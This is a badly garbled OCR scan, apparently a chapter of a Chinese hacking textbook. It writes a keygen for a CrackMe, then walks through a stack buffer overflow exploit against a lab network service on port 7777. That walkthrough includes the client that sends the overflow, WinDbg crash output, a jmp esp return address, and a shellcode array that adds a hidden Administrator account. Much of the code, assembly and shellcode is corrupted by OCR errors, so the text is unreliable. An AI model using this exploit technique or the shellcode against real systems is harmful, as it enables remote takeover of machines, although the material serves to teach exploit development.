图 8-44” 断 点 位 置 
人 简单 阅读 代码 可 以 发 现 ， 程 序 用 循环 来 计算 序列 号 ， 假 设 程序 需要 根据 每 位 输入 的 字 
符 来 计算 (其 实 的 确 是 这 样 )， 所 以 可 以 把 断 点 下 在 循环 的 首部 ， 然 后 输入 有 规律 的 数据 
(比如 这 里 笔者 输入 的 是 abcdefg， 之 所 以 要 这 样 做 是 为 了 找到 程序 在 哪里 是 否 读 入 每 位 
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s) ， 单 击 Check 按 钮 让 程序 断 下 ,分析 代码 后 可 以 得 到 这 些 关 键 位 置 ( 见 图 8-45) 。 


8080155), 


004015Са 
909491560 
994591508 
99491503 
994591506 
909491508 


9848150С 
998491502 
004015E4 
004015E7 
0864015EA 
004015EC 
004015EF 
004015F2 
004015F5 
004015F8 
G64015FA 
99491520 
00401600 
99491603 
00401606 
005016 8A 
00401608C 
004016 8F 
00401612 
00401615 
00401618 
88881618 


> 


EB 99 
8B55 ЕВ 
83C2 01 
8955 ЕВ 
8В45 ЕВ 
3845 ЕҢ 
70 42 
8850 EQ 
51 

8080 ЕС 


E8 120930099 


ВЕВЕОВ 
8855 ЕВ 
9362 

8945 ЕВ 
8B4D ЕЙ 
С1Е1 88 
8855 ЕЙ 
3301 

8955 ЕВ 
8855 ЕВ 
83С8 01 
8B4D ЕҢ 


OFAF4D ED 


F7D1 
ВЕЙЕСТ 
8855 ЕВ 
BFñFDB 
8955 FÜ 


-EB ñD 


8Вн5 ЕВ 


short Brad 500 .88481508 


ебх ,dword 
edx, 9х1 

dword ptr 
еах :dword 
еах ,dword 


ptr ss:[ebp-0x28] 


55:Геһр-Өх201|,ейбх 
ptr ss:[ebp-0x28] 
ptr ss:[ebp-0x1C] 


short Brad 500 . 8848161 


есх ,dword 
push есх 
lea ecx,duord 


mousx edx,al 
eax,dword 
eax,edx 
dword ptr 
есх ,dword 
ecx, 9х8 
ебх „диога 
едх ‚есх 
диод ptr 
еах ,dword 
еах 9х1 
есх ,dword 


imul ебх ,eax 
mou dword ptr 


call Brad_Sob. 


ptr ss:[ebp-0x28] 


ptr 55 :[ебр- 09х15] 
88081908 


ptr 55:Геһр-Өх18) 


55:[е0р- 09х10] ,еах 
ptr 55: [ебр- 09х28] 


ptr 55: [ебр-0х10] 


55 : [ебр- 09х19] ,edx 
ptr 55 :|ебр- 89х28] 


ptr ss:[ebp-0x1C] 


imul ecx,dword ptr 55: [ебр- 09х28] 


55 : Гебр- Вх18| ,edx 


jmp short Brad Sob .884815С7 


[ebp-8x28] 保 存 当 前 计算 到 的 位 数 
[ebp-8x1C] 保 存 name 总 长 


[ebp-8x18] 保 存 当前 计算 的 密码 /7/ 初 始 密 码 为 8x81276345 


接 看 ， 根 据 分 析出 的 地 址 对 应 的 变量 写 出 注册 机 的 计算 代码 (这 里 笔者 选择 使 用 
C/C++ 来 编写 注册 机 ， 因 为 C/C++ 提供 了 _asm 这 一 关键 字 ， 所 以 可 以 方便 地 用 汇编 来 实 
现 ， 简 化 了 编写 注册 机 的 难度 ) 。 


char пате [100]; 


long key; 


int Ten; 


key=2166842181; 


// 用 来 保存 输入 的 name 
// 用 来 保存 计算 中 的 密码 


// 用 来 保存 name 长 度 ( 测试 时 方便 改变 循环 次 数 来 调试 每 一 步 得 到 的 密码 ) 


ЗЕ = сти>>-патме> 3 Теп: 


for (int 1=0;1<1еп;1++) 


{ 


char m; 


п=паме [1]; 


{ 


asm 


movsx edx,m 
mov eax,key 
add eax,edx 
mov key,eax 
mov ecx,1 


501 ecx 0х8 
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// 为 key 赋 初始 值 0x81276345 对 应 的 十 进 制 


// 用 来 保存 每 位 计算 的 字符 


Е: 


mov еах, Кеу 
хог еах,есх 
mov Кеу,едх 
mov еах,1 
ааа еах, 0х1 
mov есх, 1ех 
imul есх,1 
not есх 

imul еах,есх 
mov еах, Кеу 
imul еах, еах 


mov Кеу,едх 


} 


std: :cout<<key; 


通过 上 面 的 代码 可 以 看 出 ， 输 出 的 key 还 不 是 最 终 的 密码 ， 可 以 用 循环 最 后 一 次 保存 的 
密码 来 验证 计算 的 结果 正确 与 否 〈 这 里 用 来 测试 的 name 是 12345678) ， 结 果 如 图 8-46 所 示 。 

-1786453832 的 十 六 进 制 双 字 的 值 就 是 9584E0B8， 所 以 到 这 里 的 计算 是 正确 的 。 

那么 为 什么 计算 的 结果 不 是 正确 的 密码 呢 ， 继 续 F8 单 步调 试 程序 ， 如 图 8-47 所 示 。 


jmp short Brad Sob .884815С7 
mou eax ,dword ptr 55 :|ерр- 08х10] 
push еах ТЕЛ TÆR 
68 54404000 push Brad_Sob . 90494954 ASCII "10и" 
8040 рс Теа есх ,dword ptr 55: [евр-9х24] 
51 push есх 
ЕВ 52070000 call <jmp .eFC42 .#2818> 在 这 里 eax ,ecx 改 恋 丁 
83C4 ВС add еср,8хС 
8040 рс Теа ecx,dword ptr ss:[ebp-86x24] 
99491632 ЕВ 79020000 call Вғай 5о0Вһ.080840818В0 
00401637 58 push еах 
884081638 8040 Е8 Теа ecx,duord ptr ss:[ebp-6x18] 
0010163B ЕВ 89929898 call Brad_Snoh . 888 8918С898 
00401640 85C 0 test eax,eax 
80481652). ƏF85 ҒЕӨВӨӨӨВ |jnz Brad_Sob.00401747 ET 
00401648 8080 ACFEFFFF | Теа ecx,dword ptr ss:[ebp-Bx 
994916 ЧЕ ЕВ 19070000 call < пр .ЕМЕСц2 .#540> | 关键 跳 转 
884081653 С6ц5 ЕС 93 mou byte ptr $5 :[ебр-9х4] ‚ 9х3 
00401657 бА 66 push 9х66 


图 8-46 ”测试 注册 机 ( 失败 ) 图 8-47 ”计算 序列 号 后 代码 

在 执行 完 call<jmp.&MFC42.#2818> 语 句 后 ，ecx 和 eax 值 均 被 改变 了 了 ， 而 且 ecx 存 储 的 
值 经 测试 就 是 name 对 应 的 正确 密码 。 由 此 可 以 确定 call<jmp.&MFC42.#2818> 内 的 代码 计 
算出 了 密码 。 

通过 OD 提 供 的 call 的 函数 名 可 以 看 出 来 ， 这 是 一 个 MFC 封 装 的 函数 ， 因 为 缺少 
MFC42.DLL 的 符号 表 ， 所 以 OD 没有 把 对 应 的 函数 名 告诉 我 们 。 

这 里 可 以 使 用 IDA Pro 目 动 下 载 所 需 的 符号 表 〈 也 可 以 手动 搜索 .pdb 文件 ) 来 找到 对 应 
函数 ， 把 CrackMe 扔 到 IDA Pro 中 ， 跳 转 到 0x00401642 的 位 置 ， 如 图 8-48 所 示 。 

由 此 可 见 这 个 冰 数 是 CString::Format 了 疯 数 ， 压 入 的 参数 分 别 是 call 前 3 个 push 中 的 前 2 个 

(第 3 个 push 的 是 返回 地 址 ，VC 6.0 编 译 出 的 程序 调用 函数 时 先 用 ecx 保 存 地 址 ， 然 后 压 入 
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堆栈 ) 。 


eax, [ebp+uar 16] 

еах 

offset аи ; "lu" 
ecx, [ебр+чаг 24] 


есх 

?Еокпат САС т пд  )0ААХРВ022 ; CString::Format(char const #,...) 

esp ， 

ecx, [ебр+чаг 24] 

ипкпошп libname 7 ; Microsoft UisualC 2-1B/net runtime 
; МЕС 3.1-18.8 32bit 

еах 

ecx, Гебр+чаг 18] 

sub 4981868 

еах, еах 

loc 4812747 


图 8-48 加载 符号 表 后 的 代码 注释 
其 实 有 使 用 MFC 经 验 的 程序 员 应 该 早已 猜 出 来 call 要 实现 的 功能 ， 因 为 call 前 压 入 了 一 
个 常量 参数 “%lu” 是 16 进 制 数 的 标识 。 
于 是 ， 在 注册 机 代码 下 添加 如 下 代码 : 


С5Ег1па $%г; 
ЗЪР.Еогта| (7 ("910"). Кеу); 


std:wcout<<LPCTSTR (str); 


测试 结果 如 图 8-49 所 示 。 


0 Correct!!, Way То Со. 


图 8-49 验证 注册 机 | 
可 以 看 到 ， 得 到 了 正确 密码 ， 破 解 成 功 。 


823 多 语言 配合 完成 exploit 


接 下 来 笔者 将 通过 对 一 个 程序 的 逆 加 分析， 讲解 C 语 言 、 汇 编 语 言 、CMD 命 令 等 如 何 
协同 合作 ， 来 完成 从 漏洞 挖掘 到 分 析 ， 再 到 写 入 恶意 代码 ， 最 后 完成 对 一 个 目标 计算 机 的 
exploit 过 程 。 

笔者 有 一 个 朋友 写 了 一 个 有 漏洞 的 程序 ， 模 拟 的 是 一 个 网 络 服务 。 大 家 都 知道 ， 在 运 
行 一 些 网络 服 务 的 时 候 ， 会 在 计算 机 中 开局 一 个 痛 口 ， 用 这 个 正 口 来 监听 同样 在 互联 网 上 
执行 这 个 网 络 服务 的 其 他 计算 机 发 来 的 交互 信息 ， 就 好 像 3389、445 这 些 问 口 一 样 ， 由 于 
这 个 程序 存在 漏洞 ， 正 好 可 以 拿 这 个 程序 ， 在 虚拟 机 中 配置 的 环境 下 运行 一 下 看 看 〈 见 图 


= 


——\ $ 
—— 


\ 


8-50) 。 


程序 成 功 运行 起 来 了 ， 它 其 实 是 一 个 模拟 的 网 络 服务 ， 既 然 是 网 络 服务 ， 可 以 看 看 端 
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cx C:\Documents and Settings\ådministrator\ RMA 


exploit target server 1.0 


图 8-50 Server 程 序 运 行情 况 


口 的 开放 情况 ， 在 CMD 下 用 netstat -an 查 看 结果 如 图 8-51 所 示 。 


C:\Documents and settings Mdministrator netstat 一 an 


Active 


Proto 
TCP 
TCP 
ТСР 


果然 程序 开放 了 7777 跨 口 ， 这 个 正在 监听 的 问 口 其 实 就 是 这 个 正在 运行 的 网 络 服务 开 
局 的 。 接 下 来 看 看 这 个 程序 的 功能 ， 先 正 同 反 汇编 一 下 ， 看 看 程序 是 如 何 运 行 的 。 用 IDA 


Connect ions 


Local ûddress Foreign Address State 
0.0.0.0:135 ТИОИОЯОЫС LISTENING 
й.й.0.й:445 0.0.0.0: LISTENING 
й.й.0.й:777?77 0.0.0.0:08 LISTENING 


图 8-51 Server 程 序 运行 后 端口 情况 


Pro 打 开 程 序 ， 直 接 按 F5 查 看 伪 代 码 ( 见 图 8-52) 。 


t cdecl maintint argc, const char жхағпу, const char *жепур) 


SOCKET 93; // еах@1 

SOCKET uN; // еБр@1 

void #05; // ғах8? 

void уб; // еах@5 

SOCKET 97: // ebxG6 

void #085 // еах@б 

void жу9: // eax@é 

void #010: // ғах86 

int 911; // 25107 

void жу12: // еах@8 

void «918; // еах@11 

Struct sockaddr папе; // [sp+hh] Гор-3В84п 184 
Struct sockaddr addr; // [sp+14h] Гор-зацп еб 
char 917; // [5p+28h] [bp-399h 1607 

Struct WSAData WSñData; // [5р+228һ] ГЪр-19 80 161 


WSñStartup(0x101u, &VSAData); 
v3 = socket(2, 1, 0); 

us = 93: 

if ( (signed int)u3 < В) 


ostrean operator (03); 
ostrean operator ("socket creating еггог!“); 
v5 = (void *)ostream operator (18); 
sub 481288(55, (void ( сдесі *)( DUORD))sub 801208); 
exit(1); 
} 
#( WORD *«)&пате .5а_Фата[2] = 2; 
#( WORD #)впапе за дата|4| = һЕоп5( Өх1Е61и); 
*( DWORD *)бпаме .sa data[6] = hton1(8); 


if ( bind(vh, (struct sockaddr »)((сһағ *w)&name + 4), 16) ) 


{ 


ostrean operator ("binding stream socket errort"); 
уб = (void «)озЕғеғап operator (18); 


图 8-52 ”Server 程序 反 汇 编 伪 代码 
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从 图 8-52 可 以 看 到 ， 其 实 就 是 用 常规 的 Socket 建 立 套 接 字 进行 交流 ， 用 WSAStartup 初 始 
化 ， 然 后 畸形 了 一 些 bind、listen 等 对 了 PP 端口 的 监听 ， 但 是 这 里 需要 关注 一 些 重 点 的 操作 〈 见 
图 8-53) 。 

图 8-53 这 里 htons 后 面 的 0x1E6l1u， 如 果 将 十 六 进 制 转 换 成 十 进 制 就 是 7777， 其 实 这 里 
就 是 对 端口 的 复制 ， 也 就 相当 于 C 语 言 中 的 sockaddrsin port 操 作 〈 见 图 8-54) 。 


memset(&u17/, В, 9х208и); 


ж( WORD *)&папе .sa _ dataf4] htonsfd ВХТЕб и) ; 911 = recu(u7, 8917, 512, 0); 
ж( DWORD *)ёпапе.ѕа data[6] ПҒап1(8); if ( u11 < 8) 


8-53 ”Server 程 序 反 汇编 分 析 图 8-54 ”Server 程 序 反 汇 编 分 析 
紧 接 看 可 以 看 到 recv 了 ， 这 是 Socket 方 法 中 最 为 重要 的 一 个 函数 ， 按 照 MSDN 中 的 描 
述 ，v7 是 套 接 字 名 称 ，v17 是 接收 的 数组 ，512 是 数组 大 小 ， 这 个 程序 会 监听 传 到 这 个 端口 
上 的 数组 ， 接 下 来 要 关注 一 下 这 个 数组 了 〈 见 图 8-55) 。 
sub 401000 这 个 函数 调用 了 v17 这 个 数组 ， 直 接 跟 进 这 个 函数 里 看 看 代码 〈 见 图 8-36) 。 


void жу2; // еах@1 
void жу3; // еах@1 
void жуд; // еах@1 
char u5; // [sp+8h] [bp-C8h]01 


} 
ѕир 5301000017); Гору 49 


88-55 ”Server 程 序 反 汇编 分 析 图 8-56 ”Server 程 序 漏洞 定位 
第 一 个 看 到 的 就 是 strcpy 函 数 ， 可 以 初步 认为 漏洞 发 生 在 这 里 ， 漏 洞 挖掘 最 为 重要 的 
是 对 strcpy 敏 感 ， 因 为 大 多 数 的 栈 洲 出 都 会 发 生 在 这 个 函数 中 。 假 设 笔者 复制 目标 的 bu 在 
大 小 为 8Byte， 而 笔者 对 于 al 的 大 小 并 没有 进行 严格 检查 ， 就 会 造成 栈 派出 ， 这 里 不 多 介 
绍 ， 经 过 这 一 段 的 分 析 ， 可 以 初步 考虑 POC 程 序 怎么 写 ， 也 就 是 说 ， 要 建立 一 个 与 这 个 
IP、 端 口 的 通信 ， 然 后 发 送 一 个 畸形 字符 串 到 这 个 JP 和 这 个 端口 上 ， 如 果 程 序 骨 演说 明 漏 
洞 真 的 存在 。 是 笔者 写 的 程序 的 关键 算法 如 图 8-37 所 示 。 


> 
if(WSAStartup(MAKEWORD(2,2),&wsaData)) 
4 


НЕЕ ‘Socket Inite"); 
retur 


Target_IP = argu[1]; 

Target Port = акдо[2]; 

target socket.sin family = АҒ ТНЕТ; 

target socket-sin addr-S ип.5 addr = inet addr(Target ТР); 

target socket.sin рокі = htons(atoi(Target_ жа 

5 = Socket(AF INET,SOCK STREAM, 0); Е: ЖУ 

if(connect(s,(struct sockaddr*)&target socket tt get_socket))《9)7Z 建 立 与 目标 IP 和 端口 的 连接 
4 


рғіпЕЕС ЗЕ е"); 
closesocket(s); 
WSñCleanup(); 

return 84 


H 

printf ("ERR"); 

memset(Exploit _ buffer,"h'" ,sizeof(Exploit_buffer))3ZZ 给 exploit_buffer 讨 值 为 9 
send(s,Exploit buffer,sizeof(Exploit buffer) ,NULL) ; 

printf("send окҳп"') ; 

сТосезоскег(5); 

WSñCleanup(); 

return 9; 


图 8-57 构造 Client 程 序 
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一 
а" 


其 实 很 简单 ， 通 过 建立 套 接 字 与 目标 IP 端 口 实现 连接 ， 然 后 通过 memset 对 一 个 
1024byte 大 小 的 Exploit _ buffer 赋值 ， 这 个 Exploit buffer 就 是 要 发 送 的 字符 串 ， 最 后 通过 
send 函 数 将 字符 串 发 过 去 ， 在 编译 之 后 输入 命令 发 送 这 个 字符 串 。 这 里 要 说 明 一 下 ， 在 虚 
拟 机 中 可 以 用 另外 一 个 虚拟 机 对 这 个 虚拟 机 进行 连接 ， 只 要 能 ping 通 就 可 以 ， 这 里 为 了 省 
事 ， 束 直接 向 127.0.0.1 本 地 发 送 ， 如 图 8-58 所 示 。 


C:\Documents and Settings “Яйдтпіпізсекабок> "С: -Рғоағап Files Microsoft Visual Studi 
oMyProjects\exploitme\Debug\exploitme.exe” 127.0.0.1 7777 


连接 成 功 ， 


图 8-58 Client 程序 连接 测试 
从 图 8-$8 可 以 看 到 这 个 字符 串 连 接 成 功 ， 那 么 看 看 在 接收 端 发 生 了 什么 〈 见 图 
8-59) ， 记 得 要 挂 载 WinDbg ( 见 图 8-60) 。 


exploit target server 1.0 


received: 
"т: 
ЯНЯНЯЙЯЯЯНЯНЯЯНЯНЯНЯЯЯЯНАЯНЯЯНЯНЯЯНЯНЯНАЯЯНЯНАНАЯНЯНАЯНАЯНЯНАНАЯНАЯНАНАЯНАНАЯЯНЯАНЯНЯЯЯ 


ANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
ыды. 
NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
ЯЯНЯЯНЯЯНЯНЯЯЯЯНЯНЯЯНЯНЯНЯЯНЯЯНЯЯН СОСЕ inSock 2.0 


图 8-59 Server 程 序 接收 畸形 字符 串 


чолі. JJ SUUUUU LSUDUUU K... ии а К А „11 Z хеви ра И ШИШ И l L 

(53с.30с): Ассезз violation - code с0000005 (1!!! second chance 1!!!) 
2ax=00409a68 еБ==00000080 есх=00410е20 edx=00000000 е=1=00000200 едйі-0012Ғағ4 
зір-41414141 е=р=0012#ЬЬс еБр=00000064 1ор1=0 пу пр еі pl nz па ре пс 
25=001Ь ===0023 ds=0023 е==0023 fs=003b я==0000 et 1=00000206 
41414141 ?? ЕГЕ 


88-60 ”WinDbg 跟 踪 漏 洞 触发 位 置 

接收 端 收 到 了 一 大 串 A， 即 我 们 构造 的 Exploit_buffer 中 的 内 容 ， 同 时 WinDbg 又 跳 了 
出 来 ， 程 序 崩 演 了 。EIP 指 向 41414141， 这 是 一 片 无 效 的 内 存 地 址 ， 而 41 正 是 A 的 ASCII 码 
(十 六 进 制 ) ， 漏 洞 果 然 存 在 ， 我 们 调用 kb 可 以 看 看 被 破坏 的 栈 中 的 内 容 〈 见 图 8-61) 。 

至 此 可 以 确定 ， 超 长 串 的 字符 确实 可 以 造成 漏洞 的 触发 ， 问 题 消 数 束 是 sub 401000. 
接 下 来 要 确定 洲 出 点 在 什么 位 置 ， 只 有 找到 了 确定 的 地 址 ， 才 可 以 正确 地 构造 返回 地 址 
及 窗 瘟 shellcode， 这 里 省 去 了 在 栈 中 调试 的 过 程 ， 其 实 就 是 用 memory 查 看 内 存 窗 新 
的 情况 ， 根 据 当 前 esp 的 地 址 0012fbb8 以 及 字符 串 起 始 的 位 置 来 计算 长 度 究竟 是 多 少 ， 
最 后 可 以 知道 漏洞 的 位 置 在 字符 串 的 第 201 个 字 ， 也 就 是 最 开始 的 v17[201] 开 始 出 了 问 
题 ， 于 是 将 POC 的 目标 位 置 改 成 其 他 字符 ， 来 确定 漏洞 是 否 在 那个 地 方 被 触发 〈 如 图 
8-62 所 示 ) 。 
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0:000> КЪ 


ChildEBP 
WARNING: 
ООТ2ЕБЬВ 
0012#ЬЬс 
0012#Ьс0 
0012#Ьс4 
0012#Ьс9 
0012ЕБсс 
ПОТ2ЕЪЯО 
0012ҒҺа4 
0012ҒҺа8 
0012ҒҺас 
О012ЕБей 
0012ҒҺе4 
0012Е Бед 
0012: Бес 
ОПОТ2ЕБЕО 
ПОТ12ЕЪЕ4 
ПОТ2ЕБЕЗ 
0012ҒҺЕс 
0012#с00 
0012#с04 


Retàddr 
Frame IP 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


Args to Child 
not in any known module. Following frames may Бе wrong. 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 
0=41414141 


жен WinDbg 查 看 漏洞 触发 时 内 存 空间 情况 


For(i=0;i<200;i++) 


Н 


Exploit buffer[i]="A"; 


? 

Exploit Би Ее“ | 2991-дхсс; 
Exploit Бо Ее | 29811-дхсс; 
#0" (1=202;1<512е0#(Ехр1011 Би ЕЕен) ; 1 ++) 


Exploit buffer[i]="A"; 


去 ， WinDbg BË T АЖ, 35 


EEN 610): 


18-62 МРОСФ ехрой 
这 里 将 Exploit buffer 的 第 200 和 201 位 置 的 元 素 改 成 cccc， 这 里 用 0xcc 是 因为 不 知道 
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怎么 输入 cc 对 应 ASCII 码 的 内 容 ， 用 0xcc 表 示 效 果 相 同 ， 此 时 笔者 再 次 将 这 个 程序 发 送 过 
这 次 显示 的 结果 如 图 8-63 所 示 。 


р. 
тр Цер РЕЙ 一 Ни: 0000055 и Масова на ІІІ) 


еах-00409а68 еһк-00000080 есх=00410е20 едх-00000000 е=1=00000200 ейі-0012Ғағ4 
еір-4141сссс езр=0012ЕЪБс еБр=00000064 iopl=0 


с==001Ьь ===0023 


4141сссс ?? 


0: 000> dd esp 


为 什 


者 输入 01020304 时 ， 
实 真实 情况 如 图 8-64 所 示 。 


继续 查看 栈 内 的 内 容 《〈 见 


ds=0023 


е==0023 


ЖҰТ 


EBP -> 数据 197-200- 
返回 地 址 -> 数据 201-2046 


пу пр ei 


fs=003b 9550000 


图 8-63 ”RET 地 址 的 定位 
么 是 4141cccc 呢 ?这 与 栈 的 操作 有 关 ， 其 实 就 是 低地 址 向 高 地 址 排列 ， 就 好 像 笔 
到 栈 内 就 成 了 04030201。 人 至 此 ， 可 以 确定 栈 洲 出 发 生 时 的 问题 了 ， 其 


8-64 ” 栈 洲 出 时 的 情况 


图 8-65) 。 


ChildEBP RetAddr Агаз to Child 
WARNING: Frame ІР по in any known module. Following frames мау be wrong. 
0012568 41414141 41414141 41414141 41414141 0х4141сссс 
0012ЕЪБс 41414141 41414141 41414141 41414141 0х41414141 


88-65 


167 


栈 内 内 容 


pl nz па ре пс 
еҒ1-00000206 


-NA 


至 此 可 以 完全 地 确定 这 次 exploit 应 该 如 何 完 成 了 。 这 里 将 这 个 返回 地 址 修改 成 jmp евр 
地 址 ， 然 后 将 esp 也 就 是 0012fbbc 后 的 内 容 改 成 我 们 的 shellcode ( 见 图 8-66) ， 就 能 完成 这 
次 exploit 了 〈 见 图 8-67) . 


char shellcode[]="\x31\xd2\xb2\x36\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 

"Мхй8\х8һб\х?2\х20\х8һ\х12\х8йЙ\х?е\хйс\хЗЗ\х?5\хЕ2\х89\хсС?\х@З" 
"%Мх78\хЗС\х8һ\х5/\х?8\хЙ1\хсС2\х8һ\х7/а\х2й\хй1\хс7\х3З1\хей\х8һ" 
"МхЗН\харР\хй1\хсб\хН5Ь\х81\хЗе\х5 7 \хб9\хбе\х!н5\х?5\хЕ2\х8һ\х7а" 
"Мх2Ң\хЙй1\хсС/ \хбб\х8һ\х2сС\хбЕ\х8һ\х7а\х1с\хй1\хс7\х8һ\х?с\хаЕ" 
НАХЕСАХВТА кс? Ухбвухнрух а Зухбефух В 1Ахбвух2 ВАхи2ах? 2 АҚ Х6ҒАХ6ВАХ2Ғ" 
НАхЦЛАхицахицахбваухбЕух? 2 ах? ЗАх2 ВУхбвВах? НУК? 2х6 Ах? нухбвукхво"" 
"А хбеухбоух ЗАхб8Ах2 Ах АХ НАХ О ЗЕ 2АХӨ6ҒАХ? АХ? йЙ\хб8\хб6б3'" 
НА хб ТА хбсухб? а хоВух?цухо? хх Ех х26\х2 ПА хбе\ хбълхбвухиц" 
"Ахциух2 9\х26\хб8\хбе\х2 АҚ хХ2ҒА ХЕ 1 ухб ах? 2АХ6ЕАХНЬ\ х3З3\хб8\хЗЗ"" 
"Yx6exx20ÜNXN2NK68NXH2XKRZ2NX6FNXNHDNX68NX73NX65NX72NX2BNXX68NxXx65'' 
"ХНА 2 ВАХА ВАХ Е ухбЗух2 9\ хбе\хб8\ хб5 АХ? 8х6 5х2 9\ х68\хбЗ"' 
""\хбд\хбн\х2е\х89\ хеб\ хре\х нахо хх дА OSS FfF iad"; 


8-66 ”shellcode 的 构造 


ИГО „Ата 5һе11соде 
memset(Exploit Би Еен „8 „512е0Е(Ехр1о1 г БиЕЕек)) ; //22ехр10оії виЕЕе ІҢ 278 
for(i=0;i<200;i++) 
4 

Exploit buffer[I]= "8"; 
Exploit һиғҒеғ(|208|-0Өкх12; 
Exploit һиғҒеғ(|201|-Өхіс; 
Exploit_buffer[202]=0xfa; 
Exploit_buffer[203]=0x7f; 
for(i=204;i<sizeof(shellcode};i++)}) 
Exploit_buffer[i]=shellcode[i-204]; 
for(i=204+sizeof(shellcode);i<sizeof(Exploit_buffer);i++) 
Exploit buffer[i]="A"; 


图 8-67 ”exploit 完 成 
上 面 的 shellcode 部 分 是 笔者 在 exploit-db 上 找 的 ， 其 功能 是 在 目标 计算 机 上 建立 一 个 
名 为 broK3n 的 用 户 ， 该 用 户 具 有 Administrator 权 限 。 当 然 ， 这 个 shellcode 也 可 以 换 成 其 他 
的 ， 正 如 笔者 刚才 所 讲 ， 将 对 应 的 返回 地 址 修改 成 1245fa7f， 到 了 栈 里 就 成 了 7ffa4512， 
这 是 一 个 通用 的 jmp esp 跳 转 地 址 ， 到 Windows 7 下 仍然 可 以 人 使用， 屡试不爽 。 接 下 来 宪 盖 
shellcode， 由 于 shellcode 大 小 是 194 字 ， 前 面 是 204 字 ， 总 大 小 是 $12 字 ， 不 会 超过 字符 串 的 
布置 大 小 。 在 发 送 过 去 之 后 ， 接 收 疹 显 示 的 是 图 8-68 所 示 的 内 容 。 


c C:\Documents and Settings\ådministrator\ 51 Ш \А\А\ехр101% ве А. ехе o 


Эсэсэсэезезеэсезезезе Эе-эсэеэеэезезезезезеее 


exploit target server 1.0 


I Е Е ыы мағы ыы ма ы ы ы а ы ы = 
“есетуейд: 


APAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
шн... 
ЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯНЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯ tE? 


88-68 Server 接 收 exploit 
打开 计算 机 的 用 户 列表 ， 如 图 8-69 所 示 。 


AN тъ за 
Ади анг... 管理 计生 
L éi rokan ВкоКЗп 
Р? -...-. “#3: = 


88-69 漏洞 发 生 后 远程 添加 Administrator 用 户 
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BroK3n 已 经 出 现在 计算 机 的 用 户 列表 中 了 。 当 然 ， 这 些 shellcode 还 能 完成 反弹 shell、 
下 载 执行 指定 程序 等 内 容 ， 这 些 shellcode 的 编写 方法 ， 可 以 在 论坛 中 与 大 家 一 起 交流 。 

到 这 里 ， 对 一 台 计 算 机 的 exploit 完 成 了 。 这 只 是 一 个 简单 的 程序 ， 如 果 有 人 对 这 个 过 
程 感 兴趣 ， 笔 者 可 以 将 这 个 程序 提供 给 大 家 。 在 此 想 说 的 是 这 个 程序 非常 简单 ， 假 如 计算 
机 中 在 运行 某 些 运营 商 的 某 些 网 络 服务 ， 而 那个 网 络 服务 存在 一 个 远程 执行 代码 的 漏洞 ， 
那么 黑客 就 可 以 通过 上 面 的 这 些 操作 完成 对 计算 机 的 控制 ， 其 后 果 是 很 严重 的 。 笔 者 只 是 
将 黑客 所 有 复杂 的 操作 人 简化 下 来 ， 精 人 简 之 后 就 是 上 面 所 讲 的 内 容 。 虽 然 如 今 的 计算 机 存在 
DEP、UAC 等 防护 ， 即 使 如 此 ， 有 些 黑客 大 牛 们 仍然 能 利用 各 种 高 深 的 技巧 绕 过 防护 。 
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读者 从 整个 分 析 中 可 以 知道 ， 计 算 机 的 攻击 与 防护 需要 熟练 使 用 各 种 工具 软件 ， 通 过 
使 用 汇编 和 CMD 命 令 可 以 了 解 漏 洞 是 如 何 产 生 的 ， 不 但 使 用 C 语 言 可 以 完成 对 exploit 的 编 
写 工作 ， 而 且 使 用 Python 和 Ruby 也 能 完成 相同 的 功能 。 攻 击 与 防护 工作 绝 不 是 使 用 单一 语 
言 、 单 个 工具 软件 就 能 完成 的 工作 ， 必 须要 经 过 长 期 的 学 习 与 研究 。 

读者 在 学 习 的 过 程 中 会 发 现 ， 与 内 存 打交道 其 实 并 不 是 一 件 枯燥 的 事情 ， 想 象 一 下 在 
广 朗 的 内 存 空间 中 驰 戏 ， 在 目 由 控制 指针 、 控 制程 序 的 时 候 ， 是 不 是 有 种 一 切 尽 在 掌控 的 
感觉 ， 个 中 乐趣 只 有 随 看 逐渐 地 深入 研究 之 后 才能 体会 。 

黑客 攻防 这 条 路 并 没有 想象 中 那么 难 走 ， 关 键 在 于 乐趣 。 如 果 恋 者 真心 想 学 习 逆 同 分 
析 、 漏 洞 挖掘 与 漏洞 分 析 ， 并 能 写 出 exploit 程 序 ， 从 而 完成 一 次 缓冲 区 溢出 攻击 。 第 一 ， 
要 能 耐 得 住 我 宽 。 当 读者 花 数 小 时 沉浸 在 内 存 空间 的 时 候 ， 就 是 一 个 编程 “修行 ”的 过 
程 ， 同 时 也 会 发 现 沉 浸 其 中 是 多 么 地 其 乐 无 穷 。 第 二 ， 就 是 要 多 学 习 、 多 交流 。 黑 客 绝 
